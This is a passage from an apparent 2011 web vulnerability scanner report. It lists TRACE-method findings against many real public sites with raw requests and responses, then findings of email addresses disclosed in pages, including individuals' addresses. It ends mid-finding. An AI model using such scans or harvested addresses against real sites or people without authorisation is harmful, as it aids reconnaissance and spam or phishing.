X-Cache: MISS from sq36.wikimedia.org
X-Cache-Lookup: NONE from sq36.wikimedia.org:80
Connection: close

TRACE / HTTP/1.0
Host: www.wikimedia.org
Cookie: 3ef0004212ec6ed
Via: 1.0 sq61.wikimedia.org:3128 (squid/2.7.STABLE7)
X-Forwarded-For: 173.193.214.243, 208.80.152.46


21.263. http://www.wikio.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wikio.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wikio.com
Cookie: 109d0abeebcc32bd

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:03 GMT
Server: Apache/2.2.3 (Debian) mod_jk/1.2.18
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wikio.com
Cookie: 109d0abeebcc32bd


21.264. http://www.wiktionary.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wiktionary.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wiktionary.org
Cookie: c4fba7ce14d369d0

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:53:33 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from sq73.wikimedia.org
X-Cache-Lookup: NONE from sq73.wikimedia.org:3128
X-Cache: MISS from sq60.wikimedia.org
X-Cache-Lookup: NONE from sq60.wikimedia.org:80
Connection: close

TRACE / HTTP/1.0
Host: www.wiktionary.org
Cookie: c4fba7ce14d369d0
Via: 1.0 sq73.wikimedia.org:3128 (squid/2.7.STABLE7)
X-Forwarded-For: 173.193.214.243, 208.80.152.70


21.265. http://www.worthpoint.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worthpoint.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.worthpoint.com
Cookie: a34b45b2c9f1242f

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:55 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.worthpoint.com
Cookie: a34b45b2c9f1242f


21.266. http://www.wowhead.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wowhead.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wowhead.com
Cookie: f5c10bee4e0eee65

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:27 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wowhead.com
Cookie: f5c10bee4e0eee65


21.267. http://www.wrongdiagnosis.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wrongdiagnosis.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wrongdiagnosis.com
Cookie: 7dc81dc966ff46fd

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:18 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wrongdiagnosis.com
Cookie: 7dc81dc966ff46fd


21.268. http://www.xe.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xe.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.xe.com
Cookie: 577552304ac3e72a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:24 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.xe.com
Cookie: 577552304ac3e72a


21.269. http://www.yallwire.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yallwire.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.yallwire.com
Cookie: e523649043a83c15

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:51 GMT
Server: Apache/2.2.16 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.yallwire.com
Cookie: e523649043a83c15


21.270. http://www.yellow.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yellow.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.yellow.com
Cookie: 43506e45579f1b7a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:55 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.yellow.com
Cookie: 43506e45579f1b7a
Connection: Keep-Alive
X-Client-IP: 173.193.214.243
X-VIP: 174.137.114.15_80


21.271. http://www.yidio.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yidio.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.yidio.com
Cookie: 14ac1276dd4f2388

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:13 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.yidio.com
Cookie: 14ac1276dd4f2388


21.272. http://www.younghollywood.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.younghollywood.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.younghollywood.com
Cookie: cfb60dead210617c

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Content-Type: message/http
Content-Length: 133
X-Varnish-IP: 192.168.100.142
Date: Sat, 02 Apr 2011 13:42:08 GMT
X-Varnish: 2005739096
Age: 0
Via: 1.1 varnish
Connection: close

TRACE / HTTP/1.0
Host: www.younghollywood.com
Cookie: cfb60dead210617c
X-Varnish: 2005739096
X-Forwarded-For: 173.193.214.243


21.273. http://www.yourdictionary.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yourdictionary.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.yourdictionary.com
Cookie: 2ea7b2e3b372865

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:38 GMT
Server: Apache
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.yourdictionary.com
Cookie: 2ea7b2e3b372865


21.274. http://www.yourfilehost.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yourfilehost.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.yourfilehost.com
Cookie: d275014101bbec3

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:18 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.yourfilehost.com
Cookie: d275014101bbec3


21.275. http://www.zabasearch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zabasearch.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.zabasearch.com
Cookie: 51cba6a1f53a07d3

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:39 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.zabasearch.com
Cookie: 51cba6a1f53a07d3


21.276. http://www.zeusclicks.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zeusclicks.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.zeusclicks.com
Cookie: 3a4298ea9b9bac4f

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:53 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.zeusclicks.com
Cookie: 3a4298ea9b9bac4f


21.277. http://www.zwinky.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zwinky.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.zwinky.com
Cookie: 2dbc037ca0ccb263

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.zwinky.com
Cookie: 2dbc037ca0ccb263
X-Jabodo-For: 173.193.214.243


21.278. http://www.zynga.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zynga.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.zynga.com
Cookie: 2ecb8692fd30bda6

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:44:11 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.zynga.com
Cookie: 2ecb8692fd30bda6
X-Forwarded-For: 173.193.214.243


22. Email addresses disclosed
There are 16 instances of this issue:


22.1. http://www.androidcentral.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.androidcentral.com
Path:   /favicon.ico

Issue detail

The following email addresses were disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.androidcentral.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: spe
Date: Sat, 02 Apr 2011 14:06:31 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Set-Cookie: SESSff98d42578ac6106ce5b7f80c23f307a=hr1onak19pbmm2diiqpgglrca2; expires=Mon, 25-Apr-2011 17:39:51 GMT; path=/; domain=.androidcentral.com
Last-Modified: Sat, 02 Apr 2011 14:00:10 GMT
ETag: "acfc4415a958e438545290ed1f077f57"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Length: 367789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Home |
...[SNIP]...
<a
href="javascript:location.href='mailto:'+String.fromCharCode(112,104,105,108,64,97,110,100,114,111,105,100,99,101,110,116,114,97,108,46,99,111,109)+'?'">phil@androidcentral.com</a>
...[SNIP]...
<a
href="javascript:location.href='mailto:'+String.fromCharCode(106,101,114,114,121,64,97,110,100,114,111,105,100,99,101,110,116,114,97,108,46,99,111,109)+'?'">jerry@androidcentral.com</a>
...[SNIP]...
<a
href="javascript:location.href='mailto:'+String.fromCharCode(99,104,114,105,115,64,97,110,100,114,111,105,100,99,101,110,116,114,97,108,46,99,111,109)+'?'">chris@androidcentral.com</a>
...[SNIP]...
<a
href="javascript:location.href='mailto:'+String.fromCharCode(99,111,114,121,64,97,110,100,114,111,105,100,99,101,110,116,114,97,108,46,99,111,109)+'?'">cory@androidcentral.com</a>
...[SNIP]...

22.2. http://www.bookrags.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bookrags.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bookrags.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 1099

<html>
<head>
<title>Request Rejected</title>
</head>
<body>We apologize for any inconvenience.<br><br>
The URL (web address) you requested returned an error in our system.<br>
Please
...[SNIP]...
<a href="mailto:customerservice@bookrags.com?subject=support ID is: 12810563297334068488">
...[SNIP]...

22.3. http://www.kcom.com/contact-us/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /contact-us/

Issue detail

The following email address was disclosed in the response:

Request

GET /contact-us/ HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1301749027; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.3.9.1301752673281

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1301749030; expires=Sun, 01-Apr-2012 13:57:10 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:57:11 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="Content-t
...[SNIP]...
<input type="hidden" name="debugEmail" value="zoe.keeping@kcom.com">
...[SNIP]...

22.4. http://www.kcom.com/contact-us/brighton

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /contact-us/brighton

Issue detail

The following email address was disclosed in the response:

Request

GET /contact-us/brighton HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1301749029; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.4.9.1301752673281

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1301749040; expires=Sun, 01-Apr-2012 13:57:20 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fcontact-us%2Fbrighton%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:57:21 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="Content-t
...[SNIP]...
<a onclick="pageTracker._trackTrans()" href="mailto:me@kcom.com">me@kcom.com</a>
...[SNIP]...
<a onclick="pageTracker._trackTrans()" href="mailto:me@kcom.com">me@kcom.com</a>
...[SNIP]...
= _gat._getTracker("UA-11562191-1");
orderNum = getOrderID();
pageTracker._addTrans(
orderNum,
"",
"10",
"",
"",
"",
"",
""
);
pageTracker._addItem(
orderNum,
"me@kcom.com",
"Email Link",
"General enquiries",
"10",
"1"
);
} catch(err) {}</script>
...[SNIP]...

22.5. http://www.livevideo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livevideo.com
Path:   /favicon.ico

Issue detail

The following email addresses were disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.livevideo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 02 Apr 2011 14:04:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=q58e2q8qs5alfuj8eu827ing04; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 503 Service Temporarily Unavailable
Retry-After: 7200
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25139


<font face=arial size=2>
<table border=0 cellspacing=0 cellpadding=0 width=750 align=center><tr><td>
<center><br><img src="/live-video.gif"><br><br>

<table border=0 cellspacing=0 cellpadding=20 widt
...[SNIP]...
<robert@SCAPALAW.COM>
...[SNIP]...
<br />
From: rob@scapalaw.com<br />
...[SNIP]...
<br />
Reply-To: rob@scapalaw.com<br />
...[SNIP]...
<br />
To: rob@scapalaw.com (QUADRANET)<br />
...[SNIP]...
<milan@quadranet.com>
...[SNIP]...
<br />
From: rob@scapalaw.com (QUADRANET)<br />
...[SNIP]...
<milan@quadranet.com>
...[SNIP]...
<br />
To: "Rob Scapa" robert@SCAPALAW.COM (QUADRANET)<br />
...[SNIP]...
<br />
From: "Rob Scapa" robert@SCAPALAW.COM (QUADRANET)<br />
...[SNIP]...
<br />
email: Milan@quadranet.com<br />
...[SNIP]...

22.6. http://www.menupages.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.menupages.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.menupages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 NOT FOUND
Date: Sat, 02 Apr 2011 13:56:11 GMT
Server: Apache
Cache-Control: max-age=300
Expires: Sat, 02 Apr 2011 14:01:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 7920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<a class="scramble" rel="feedback/menupages.com" href="mailto:feedback@menupages.com?subject=Feedback">
...[SNIP]...

22.7. http://www.mycheckfree.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mycheckfree.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mycheckfree.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:35:12 GMT
Server: Apache
Content-Length: 320
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
<hr />
...[SNIP]...
<a href="mailto:info@checkfree.com">
...[SNIP]...

22.8. http://www.myrecipes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myrecipes.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myrecipes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:43:13 GMT
Server: Apache
ETag: "437b78-39-49e76a4611d00"
Accept-Ranges: bytes
Content-Type: text/html
Vary: X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi O TRo IND DSP CAO COR', CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi O TRo IND DSP CAO COR'
Content-Length: 24220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Page Not Found |
...[SNIP]...
<a href="mailto:contactus@myrecipes.com?subject=Report an Error">
...[SNIP]...

22.9. http://www.opentable.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.opentable.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3024000
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Tue, 15 Mar 2011 18:49:22 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-07
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:19-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Sat, 02 Apr 2011 13:45:16 GMT

...[SNIP]...

22.10. http://www.realsimple.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realsimple.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.realsimple.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:44:09 GMT
Server: Apache
ETag: "11faa34-1413-4875db8624980"
Accept-Ranges: bytes
Content-Type: text/html
Vary: X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR', CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Content-Length: 36963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Page Not Found - Re
...[SNIP]...
<a href="mailto:realsimpleonline@customersvc.com">
...[SNIP]...

22.11. http://www.springerlink.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.springerlink.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.springerlink.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 13:45:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 212

<HTML><BODY><H3>403 Forbidden</H3><I>ErrorId: 0428e6a8-4d28-4d50-909e-92b57031a6ae</I><p>Please contact <a href="mailto:support@metapress.com">support@metapress.com</a> if this problem persists.</p></
...[SNIP]...

22.12. http://www.thefreedictionary.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefreedictionary.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thefreedictionary.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: max-age=172800
Content-Type: image/x-icon
Last-Modified: Mon, 31 May 2010 17:29:22 GMT
Accept-Ranges: bytes
ETag: "14c7b0cee60cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO PSA OUR"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)), (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (v 0 s 0 n 0 l 0)), (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (l 0 s 0 v 0 o 0))
Date: Sat, 02 Apr 2011 13:27:08 GMT
Content-Length: 894

...[SNIP]...

22.13. http://www.travel-ticker.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travel-ticker.com
Path:   /favicon.ico

Issue detail

The following email addresses were disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travel-ticker.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2FB9835EB71FFEAA1AA9FFE640CE8E63; Path=/
Set-Cookie: SaneID=2FB9835EB71FFEAA1AA9FFE640CE8E6; Expires=Sun, 06-Mar-2016 14:16:40 GMT; Path=/
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-control: no-store, no-cache, private, must-revalidate
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 14:16:40 GMT
Set-Cookie: NSC_xxx.usbwfm-ujdlfs-iuuq=ffffffffaf131c3045525d5f4f58455e445a4a422d69;path=/;httponly
Content-Length: 102294


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta name="robots" content="noindex, nofollow">

<link rel="stylesheet" href="
...[SNIP]...
<input type="text" name="TTTellAFriendLayer-yourEmailTellFrnd" value="your_email@address.com"
id="TTTellAFriendLayer-yourEmailTellFrnd"
onfocus="CompSupport.callJsObj(this, 'clearField', [this]);">
...[SNIP]...
<input type="text" name="TTTellAFriendLayer-friendsEmailTellFrnd" value="friends_email@address.com"
id="TTTellAFriendLayer-friendsEmailTellFrnd"
onfocus="CompSupport.callJsObj(this, 'clearField', [this]);">
...[SNIP]...
<input type="text" class="email" id="signUpEmail" name="signUpEmail" value="your_email@address.com"
onfocus="this.select();">
...[SNIP]...
<input type="text" class="email " id="unsubscribeEmail" name="inputEmail" value="your_email@address.com"
onfocus="this.select();">
...[SNIP]...
<input type="text" class="email" id="changeZipEmail" name="signUpEmail" value="your_email@address.com"
onfocus="this.select();">
...[SNIP]...
<input type="text" class="email" id="changeEmail_Email" name="signUpEmail" value="your_email@address.com"
onfocus="this.select();">
...[SNIP]...

22.14. http://www.va.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.va.gov
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.va.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache

